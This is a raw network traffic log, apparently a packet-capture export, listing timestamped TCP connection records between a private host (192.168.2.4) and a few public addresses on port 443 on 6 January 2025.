                                                                                                          Jan 6, 2025 12:09:24.511934996 CET50150443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.513890028 CET50150443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.513900042 CET44350150104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.532044888 CET44350138104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.532131910 CET44350138104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.532196999 CET50138443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.533288956 CET50138443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.533304930 CET44350138104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.538842916 CET50153443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.538871050 CET44350153104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.538965940 CET50153443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.539144993 CET50153443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.539155006 CET44350153104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.599169970 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.599332094 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.599381924 CET50136443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.599402905 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.599533081 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.599560022 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.599575043 CET50136443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.599584103 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.599617958 CET50136443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.600085020 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.600136042 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.600177050 CET50136443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.600183964 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.600218058 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.600260019 CET50136443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.600265980 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.600279093 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.600327015 CET50136443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.600519896 CET50136443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.600534916 CET44350136104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.601038933 CET50154443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.601063013 CET44350154104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.601151943 CET50154443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.601706982 CET50154443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.601722956 CET44350154104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.635354042 CET44350135104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.635396004 CET44350135104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.635433912 CET50135443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.635448933 CET44350135104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.635463953 CET44350135104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.635509968 CET50135443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.636190891 CET50135443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.636208057 CET44350135104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.636508942 CET50156443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.636535883 CET44350156104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.636590958 CET50156443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.638057947 CET50156443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.638068914 CET44350156104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.671426058 CET44350139185.49.145.45192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.671673059 CET50139443192.168.2.4185.49.145.45
                                                                                                          Jan 6, 2025 12:09:24.671694040 CET44350139185.49.145.45192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.672542095 CET44350139185.49.145.45192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.672595978 CET50139443192.168.2.4185.49.145.45
                                                                                                          Jan 6, 2025 12:09:24.672897100 CET50139443192.168.2.4185.49.145.45
                                                                                                          Jan 6, 2025 12:09:24.672950029 CET44350139185.49.145.45192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.673053980 CET50139443192.168.2.4185.49.145.45
                                                                                                          Jan 6, 2025 12:09:24.673062086 CET44350139185.49.145.45192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.715817928 CET50139443192.168.2.4185.49.145.45
                                                                                                          Jan 6, 2025 12:09:24.763444901 CET44350140104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.766745090 CET50140443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.766756058 CET44350140104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.767080069 CET44350140104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.769728899 CET50140443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.769785881 CET44350140104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.769872904 CET50140443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.799019098 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.799304962 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.799318075 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.800184965 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.800285101 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.800597906 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.800649881 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.800740957 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.811331034 CET44350140104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.824135065 CET44350142104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.831626892 CET50142443192.168.2.4104.18.3.4
                                                                                                          Jan 6, 2025 12:09:24.831656933 CET44350142104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.832498074 CET44350142104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.832565069 CET50142443192.168.2.4104.18.3.4
                                                                                                          Jan 6, 2025 12:09:24.832880974 CET50142443192.168.2.4104.18.3.4
                                                                                                          Jan 6, 2025 12:09:24.832937002 CET44350142104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.833028078 CET50142443192.168.2.4104.18.3.4
                                                                                                          Jan 6, 2025 12:09:24.841470003 CET44350144104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.843003988 CET44350143104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.843266010 CET50143443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.843288898 CET44350143104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.843336105 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.843379974 CET50144443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.843389988 CET44350144104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.843583107 CET44350143104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.843852997 CET50143443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.843913078 CET44350143104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.843986988 CET50143443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.844235897 CET44350144104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.844291925 CET50144443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.844556093 CET50144443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.844609976 CET44350144104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.844643116 CET50144443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.845293999 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.845304966 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.855017900 CET44350145104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.873207092 CET50142443192.168.2.4104.18.3.4
                                                                                                          Jan 6, 2025 12:09:24.873222113 CET44350142104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.887341976 CET44350144104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.887341976 CET44350143104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.887984037 CET50144443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.887994051 CET44350144104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.888031960 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.893819094 CET50145443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.893826962 CET44350145104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.894754887 CET44350145104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.894825935 CET50145443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.895860910 CET50145443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.895920992 CET44350145104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.896061897 CET50145443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.896068096 CET44350145104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.907365084 CET44350140104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.907439947 CET44350140104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.909209967 CET50140443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.910489082 CET50140443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.910500050 CET44350140104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.916953087 CET50157443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.916995049 CET44350157104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.917073011 CET50157443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.917613029 CET50157443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.917635918 CET44350157104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.918055058 CET44350139185.49.145.45192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.918104887 CET44350139185.49.145.45192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.918164015 CET50139443192.168.2.4185.49.145.45
                                                                                                          Jan 6, 2025 12:09:24.918914080 CET50139443192.168.2.4185.49.145.45
                                                                                                          Jan 6, 2025 12:09:24.918922901 CET44350139185.49.145.45192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.919909954 CET50142443192.168.2.4104.18.3.4
                                                                                                          Jan 6, 2025 12:09:24.930831909 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.931616068 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.931646109 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.931932926 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.935406923 CET50144443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.937815905 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.937874079 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.937931061 CET50145443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.937973022 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.945039034 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945079088 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945111990 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945147991 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945156097 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.945161104 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945197105 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.945219040 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945250988 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945264101 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.945267916 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945394039 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945436954 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.945441008 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.945482016 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.945944071 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.950980902 CET44350147104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.953352928 CET50147443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.953358889 CET44350147104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.953643084 CET44350147104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.955743074 CET50147443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.955806017 CET44350147104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.955879927 CET50147443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.970899105 CET44350144104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.970971107 CET44350144104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.971021891 CET50144443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.973093987 CET44350143104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.973164082 CET44350143104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.973242044 CET50144443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.973258018 CET50143443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.973263025 CET44350144104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.976584911 CET44350150104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.976769924 CET50150443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.976790905 CET44350150104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.977629900 CET44350150104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.977705002 CET50150443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.978188038 CET50150443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.978239059 CET44350150104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.978485107 CET50150443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.978492022 CET44350150104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.979340076 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.980020046 CET44350148104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.982084990 CET44350149104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.985030890 CET50149443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.985048056 CET44350149104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.985383987 CET50148443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.985398054 CET44350148104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.985697985 CET44350148104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.985917091 CET44350149104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.985974073 CET50149443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.986356020 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:24.986368895 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.988487959 CET50149443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.988543034 CET44350149104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.988831997 CET50148443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.988890886 CET44350148104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.989226103 CET50149443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.989239931 CET44350149104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.989316940 CET50148443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.990073919 CET50158443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.990097046 CET44350158104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.990252018 CET50158443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.990519047 CET50158443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.990530014 CET44350158104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.992024899 CET50143443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.992037058 CET44350143104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.995923042 CET50159443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.995944977 CET44350159104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.996006012 CET50159443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.996210098 CET50159443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:24.996222973 CET44350159104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:24.999330044 CET44350147104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.002002001 CET44350153104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.004044056 CET50153443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.004062891 CET44350153104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.004646063 CET44350153104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.006529093 CET44350145104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.006606102 CET44350145104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.006671906 CET50145443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.006736040 CET50153443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.006798029 CET44350153104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.006860018 CET50153443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.008686066 CET50145443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.008696079 CET44350145104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.009818077 CET50160443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.009835005 CET44350160104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.009908915 CET50160443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.010479927 CET50160443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.010488033 CET44350160104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.031582117 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.031635046 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.031665087 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:25.031732082 CET50150443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.031739950 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:25.033248901 CET50149443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.033534050 CET50141443192.168.2.4188.114.96.3
                                                                                                          Jan 6, 2025 12:09:25.033544064 CET44350141188.114.96.3192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.035331964 CET44350148104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.047342062 CET44350153104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.051163912 CET50153443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.056005955 CET44350154104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.057621956 CET50154443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.057651043 CET44350154104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.058139086 CET44350142104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.058190107 CET44350142104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.058238983 CET50142443192.168.2.4104.18.3.4
                                                                                                          Jan 6, 2025 12:09:25.058507919 CET44350154104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.058562994 CET50154443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.059043884 CET50154443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.059108019 CET44350154104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.059789896 CET50142443192.168.2.4104.18.3.4
                                                                                                          Jan 6, 2025 12:09:25.059803963 CET44350142104.18.3.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.060292006 CET50154443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.060305119 CET44350154104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.069936037 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.069983006 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.070008993 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.070039034 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.070050955 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.070105076 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.070142031 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.070189953 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.070261955 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.070270061 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.070657969 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.071420908 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.071429014 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.074664116 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.074692011 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.074722052 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.074729919 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.074738979 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.074764967 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.074793100 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.077826023 CET50146443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.077831030 CET44350146104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.094582081 CET44350147104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.094654083 CET44350147104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.094891071 CET50147443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.098752975 CET50147443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.098762989 CET44350147104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.099037886 CET50161443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.099069118 CET44350161104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.099133015 CET50161443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.099978924 CET50161443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.099992990 CET44350161104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.101667881 CET44350156104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.101844072 CET50156443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.101860046 CET44350156104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.102699995 CET44350156104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.102760077 CET50156443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.103024006 CET50156443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.103071928 CET44350156104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.103138924 CET50156443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.112874985 CET44350149104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.112940073 CET44350149104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.113178968 CET50149443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.113702059 CET50149443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.113714933 CET44350149104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.113966942 CET50154443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.113981962 CET50162443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.113995075 CET44350162104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.114005089 CET44350150104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.114054918 CET44350150104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.114070892 CET50162443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.114094973 CET50150443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.114995956 CET50162443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.115005016 CET44350162104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.116424084 CET50150443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.116434097 CET44350150104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.116547108 CET44350148104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.116616011 CET44350148104.18.2.4192.168.2.4
                                                                                                          Jan 6, 2025 12:09:25.116660118 CET50148443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.116717100 CET50163443192.168.2.4104.18.2.4
                                                                                                          Jan 6, 2025 12:09:25.116734028 CET44350163104.18.2.4192.168.2.4
